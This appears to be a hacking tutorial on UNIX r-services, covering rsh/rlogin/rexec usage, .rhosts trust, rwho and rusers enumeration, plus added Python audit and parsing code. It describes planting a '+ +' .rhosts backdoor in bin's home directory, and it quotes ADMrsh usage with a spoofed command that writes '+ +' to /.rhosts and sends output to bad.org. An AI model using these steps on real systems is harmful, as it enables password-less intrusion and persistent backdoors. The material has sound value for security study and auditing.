Hacking UNIX R-Services

R-Services

Unix r-services are common to commercial platforms, including Solaris, HP-UX, and AIX. I have assembled a list from the /etc/services file as follows:

exec            512/tcp
login           513/tcp
shell           514/tcp

Each service runs using standard PAM username and password authentication, which is overridden by ~/.rhosts and /etc/hosts.equiv entries defining trusted hosts and usernames. Locally, you will find that on Unix-based systems, the exec service is in.rexecd, the login service is in.rlogind, and the shell service is in.rshd.

Directly Accessing R-Services

From a Unix-based platform, you use the rsh, rlogin, and rexec clients to access the respective r-services running on a remote host. The examples below show how each client is invoked from the command shell.

Solaris

# rsh
usage: rsh [-nd] [-l login] host [command]

# rlogin
usage: rlogin [ -8EL] [-e char] [ -l username ] host

# rexec
rexec: Require at least a host name and command.

Usage: rexec [ -abcdhns ] -l username -p password  host command

     -l username: Sets the login name for the remote host.
     -p password: Sets the password for the remote host.
     -n: Explicitly prompt for name and password.
     -a: Do not set up an auxiliary channel for standard error.
     -b: Use BSD-rsh type signal handling.
     -c: Do not close remote standard in when local input closes
     -d: Turn on debugging information.
     -h: Print this usage message.
     -s: Do not echo signals to the remote process.


Mac OS X

$ rsh
usage: rsh [-46dn] [-l username] [-t timeout] host [command]

Note: the rsh client's options differ between systems, so the usage shown on one platform may not apply on another.

Unix/Linux ~/.rhosts and /etc/hosts.equiv files

The .rhosts file lives in the user's home directory under Unix and contains a list of username and host (IP address or hostname) pairs, such as the following:


Solaris misconfigured .rhosts file:

# pwd
/home/chris
# cat .rhosts
chris        mail.xmm.com
+     192.168.0.10
#

Linux misconfigured .rhosts file, allowing everything:

# pwd
/home/root
# cat .rhosts
+ +

In the first example, I can use any of the r-services (rsh, rlogin, or rexec) to connect to this host from mail.trustmatta.com if I am logged into that host as chris, or from 192.168.0.10 with any username on that host.

When a user connects to the host running rshd (the remote shell daemon running on TCP port 514), the source IP address is cross-referenced against the .rhosts file, and the username is verified by querying the identd service running at the source. If these details are valid, direct access is given to the host without even requiring a password.

A simple, yet effective, backdoor for most Unix-based systems running rshd is to place an .rhosts file in the home directory of the bin user (/usr/bin/ under Solaris) containing the wildcards + +. 
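As an added illustration (not from the original page), here is a small audit routine for the trust files just described: given the body of a ~/.rhosts or /etc/hosts.equiv file, it flags a '+' wildcard wherever it appears (the page's examples list user then host, while hosts.equiv(5) documents host then user, so no field order is relied on) and escalates when the file sits in root's or bin's home directory, the backdoor location mentioned above. The set of privileged home directories and the severity labels are assumptions.

```python
from typing import List, Tuple

# Home directories the page names as backdoor locations (bin's home is
# /usr/bin under Solaris); treating these as privileged is an assumption.
PRIVILEGED_HOMES = {"/": "root", "/root": "root", "/home/root": "root", "/usr/bin": "bin"}
SEVERITY = {"info": 0, "medium": 1, "high": 2, "critical": 3}

def audit_trust_file(path: str, content: str) -> List[Tuple[str, str]]:
    """Return (severity, message) findings for one ~/.rhosts or /etc/hosts.equiv.

    Entries are whitespace-separated host/user fields. A bare '+' in either
    field is a wildcard and '+ +' trusts every user on every host; because
    field order varies, '+' is flagged wherever it appears. rshd checks only
    the source address and the client-controlled ident reply, so any such
    entry is password-less access.
    """
    owner = PRIVILEGED_HOMES.get(path.rsplit("/", 1)[0] or "/")
    findings = []
    for lineno, raw in enumerate(content.splitlines(), 1):
        entry = raw.split("#", 1)[0].strip()   # drop comments and blank lines
        if not entry:
            continue
        fields = entry.split()
        where = f"{path}:{lineno}"
        if fields == ["+", "+"]:
            findings.append(("critical", f"{where}: '+ +' trusts every user from every host"))
        elif "+" in fields:
            findings.append(("high", f"{where}: wildcard entry {entry!r}"))
        elif any(f.startswith("-") for f in fields):
            findings.append(("info", f"{where}: negative (deny) entry {entry!r}"))
        else:
            findings.append(("medium", f"{where}: password-less trust for {entry!r}"))
    if owner and findings:
        findings.append(("critical",
                         f"{path}: trust file in {owner}'s home directory (backdoor pattern)"))
    return findings

def worst_severity(findings: List[Tuple[str, str]]) -> str:
    """Highest severity present, 'info' when the file is clean."""
    return max((sev for sev, _ in findings), key=SEVERITY.get, default="info")
```

Run it over every home directory's .rhosts plus /etc/hosts.equiv; any 'high' or 'critical' finding is access gated by nothing but source address and ident.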

Spoofing RSH Connections

If you are aware of trust between hosts, you can spoof RSH connections to appear as if they come from trusted hosts, using IP sequence prediction and falsified client responses to match entries in .rhosts files server-side. One tool that can perform RSH spoofing and execute commands is ADMrsh, available from the ADM site (http://adm.freelsd.net/ADM/). The utility requires the latest version of ADMspoof and its header files (found in ADM-spoof-NEW.tgz at the time of writing); its usage is shown here:

                                 ADMrsh
                                 **==**

 It's very easy to use (like all the ADM products).

 ADMrsh [ips] [ipd] [ipl]  [luser] [ruser] [cmd]

 Parameters List :
 ips   =   ip source (ip of the trusted host)
 ipd   =   ip destination (ip of the victim)
 ipl   =   ip local (your ip to receive the informations)
 luser =   local user
 ruser =   remote user
 cmd   =   command to execute

 If ya don't understand, this is an example :

 ADMrsh a.foo.us b.foo.us bad.org root root "echo\"+ +\">/.rhosts"

 Credit's : Heike , ALL ADM CreW , !w00w00 , Darknet
 ADMrsh 0.5 pub (c) ADM  <-- hehe ;)


rwho

The "rwho" protocol provides a simple scheme for listing UNIX machines on the local segment and who is logged onto them. Each UNIX host runs a daemon (usually "in.rwhod" or "rwhod") that periodically broadcasts its own information and listens for other machines' broadcasts. Each machine then keeps a list of active machines and logged-on users.

This presents a security risk for network managers, because it exposes machine names as well as user names. The 'rwhod' service should be disabled on secure machines.

When a user types the command "rwho" at the command line, they get a list that looks something like:

smaug           up 13 days, 21:49,    load average: 0.00, 0.00, 0.01
frodo           up 23 days, 10:23,    load average: 0.00, 0.01, 0.02

Note: The broadcast from each machine is a UDP packet sent to port 513.

Options

     -a      Report all users whether or not they have typed to the system in the past hour.

Paths

     /var/spool/rwho/whod.*        Contains information about other machines.

Notes

rwho does not work through gateways. The directory /var/spool/rwho must exist on the host from which rwho is run. This service takes up progressively more network bandwidth as the number of hosts on the local net increases. For large networks, the cost becomes prohibitive.
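As an added example (not part of the original page), a decoder for the rwhod status broadcast, which lets a defender spot hosts on a segment that still run rwhod and should have it disabled. The packet layout (struct whod and struct whoent) is taken from the BSD <protocols/rwhod.h> header, not from the page, and the sample packet is constructed by the block rather than captured.

```python
import struct
from typing import Dict, List, Tuple

# struct whod / struct whoent layout from the BSD <protocols/rwhod.h> header
# (an assumption: the page only says the broadcast goes to UDP port 513).
# Integers are 32-bit big-endian; load averages are scaled by 100 on the wire.
WHOD_HDR = struct.Struct("!bb2xii32s3ii")   # 60-byte host status header
WHOENT = struct.Struct("!8s8sii")           # 24 bytes per logged-in user
WHODVERSION, WHODTYPE_STATUS = 1, 1
RWHOD_PORT = 513                            # UDP, as the page notes

def _cstr(raw: bytes) -> str:
    return raw.split(b"\0", 1)[0].decode("ascii", "replace")

def parse_whod(pkt: bytes) -> Dict:
    """Decode one rwhod broadcast into host status plus its user entries."""
    if len(pkt) < WHOD_HDR.size:
        raise ValueError("short rwhod packet")
    vers, typ, sent, _recv, host, l1, l5, l15, boot = WHOD_HDR.unpack_from(pkt)
    if vers != WHODVERSION or typ != WHODTYPE_STATUS:
        raise ValueError(f"unsupported rwhod version/type {vers}/{typ}")
    users = []
    for off in range(WHOD_HDR.size, len(pkt) - WHOENT.size + 1, WHOENT.size):
        line, name, t_on, idle = WHOENT.unpack_from(pkt, off)
        users.append({"user": _cstr(name), "tty": _cstr(line),
                      "login": t_on, "idle": idle})
    return {"host": _cstr(host), "uptime": sent - boot,
            "load": (l1 / 100, l5 / 100, l15 / 100), "users": users}

def ruptime_line(info: Dict) -> str:
    """Render the 'host up N days, hh:mm, load average' line shown above."""
    days, rem = divmod(info["uptime"], 86400)
    hours, mins = divmod(rem // 60, 60)
    load = ", ".join(f"{x:.2f}" for x in info["load"])
    return f"{info['host']:<15} up {days} days, {hours:02d}:{mins:02d}, load average: {load}"

def build_whod(host: str, boot: int, now: int, load: Tuple[float, float, float],
               users: List[Tuple[str, str, int, int]]) -> bytes:
    """Construct a sample broadcast (a test fixture, not captured traffic)."""
    hdr = WHOD_HDR.pack(WHODVERSION, WHODTYPE_STATUS, now, 0, host.encode(),
                        *(int(round(x * 100)) for x in load), boot)
    body = b"".join(WHOENT.pack(tty.encode(), user.encode(), t_on, idle)
                    for user, tty, t_on, idle in users)
    return hdr + body
```

Feeding parse_whod the payload of each datagram seen on UDP 513 yields an inventory of every host still advertising its users on the segment.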

rusers

The Unix rusers service is a Remote Procedure Call (RPC) service that listens on a dynamic TCP port. The rusers client utility first connects to the RPC portmapper on TCP port 111, which returns the whereabouts of the rusersd service if it is active.

During initial TCP port scans, if the RPC portmapper service isn't found to be accessible, it is highly unlikely that rusersd will be accessible. If, however, TCP or UDP port 111 is found to be accessible, the rpcinfo client can check for the presence of rusersd and other accessible RPC services.


# rpcinfo -p 192.168.0.9
100000   4    tcp  111   rpcbind
100000   4    udp  111   rpcbind
100024   1    udp  32772 status
100024   1    tcp  32771 status
100021   4    udp  4045  nlockmgr
100021   2    tcp  4045  nlockmgr
100005   1    udp  32781 mountd
100005   1    tcp  32776 mountd
100003   2    udp  2049  nfs
100011   1    udp  32822 rquotad
100002   2    udp  32823 rusersd
100002   3    tcp  33180 rusersd

Note: If rusersd is running, you can probe the service with the rusers client (available on most Unix-based platforms) to retrieve a list of users logged into the system, as shown in Example 5-18.

# rusers -l 192.168.0.50
Sending broadcast for rusersd protocol version 3...
Sending broadcast for rusersd protocol version 2...
james    onyx:console            Mar  3 13:03   22:03
amber    onyx:ttyp1              Mar  2 07:40
chris    onyx:ttyp5              Mar  2 10:35      14
al       onyx:ttyp6              Mar  2 10:48
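Added example, not from the page: a parser for the rpcinfo -p listing above that performs offline the lookup the rusers client asks the portmapper for, mapping program 100002 to the dynamic port and protocol it registered on, so a scan result can be checked for rusersd exposure without re-querying the host. The embedded listing is copied from the page; the function names are assumptions.

```python
from typing import Dict, List, NamedTuple, Tuple

SAMPLE_RPCINFO = """\
# rpcinfo -p 192.168.0.9
100000   4    tcp  111   rpcbind
100000   4    udp  111   rpcbind
100024   1    udp  32772 status
100024   1    tcp  32771 status
100021   4    udp  4045  nlockmgr
100021   2    tcp  4045  nlockmgr
100005   1    udp  32781 mountd
100005   1    tcp  32776 mountd
100003   2    udp  2049  nfs
100011   1    udp  32822 rquotad
100002   2    udp  32823 rusersd
100002   3    tcp  33180 rusersd
"""
RUSERSD = 100002   # program number the page's listing shows for rusersd

class RpcService(NamedTuple):
    program: int
    version: int
    proto: str
    port: int
    name: str

def parse_rpcinfo(output: str) -> List[RpcService]:
    """Parse 'program vers proto port [name]' lines, skipping prompt/header lines."""
    services = []
    for raw in output.splitlines():
        fields = raw.split()
        if len(fields) < 4 or not fields[0].isdigit():
            continue                         # "# rpcinfo -p ..." prompt, headers
        name = fields[4] if len(fields) > 4 else ""   # name column may be absent
        services.append(RpcService(int(fields[0]), int(fields[1]),
                                   fields[2].lower(), int(fields[3]), name))
    return services

def locate(services: List[RpcService], program: int) -> Dict[Tuple[str, int], int]:
    """The lookup rusers asks the portmapper for: (proto, version) -> dynamic port."""
    return {(s.proto, s.version): s.port for s in services if s.program == program}

def rusersd_exposure(output: str) -> str:
    """One-line verdict on whether rusersd is reachable through the portmapper."""
    hits = locate(parse_rpcinfo(output), RUSERSD)
    if not hits:
        return "rusersd not registered with the portmapper"
    return "rusersd registered on " + ", ".join(
        f"{proto}/{port} (v{ver})" for (proto, ver), port in sorted(hits.items()))
```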

Man page


Synopsis

rusers [-al] [host ...]

Description

The rusers command produces output similar to who, but for the list of hosts or all machines on the local network. For each host responding to the rusers query, the hostname is printed on a line along with the names of the users currently logged on. The rusers command will wait for one minute to catch late responders.

The following options are available:

     -a      Print all machines responding even if no one is currently logged in.

     -l      Print a long format listing. This includes the user name, host name, tty that the user is logged in to, the date and time the user logged in, the amount of time since the user typed on the keyboard, and the remote host they logged in from (if applicable).

Diagnostics

rusers: RPC: Program not registered
     The rpc.rusersd(8) daemon has not been started on the remote host.

rusers: RPC: Timed out
     A communication error occurred. Either the network is excessively congested, or the rpc.rusersd(8) daemon has terminated on the remote host.

rusers: RPC: Port mapper failure - RPC: Timed out
     The remote host is not running the portmapper (see portmap(8)), and cannot accommodate any RPC-based services. The host may be down.

See Also

rwho(1), users(1), who(1), portmap(8), rpc.rusersd(8)

History

The rusers command appeared in SunOS.
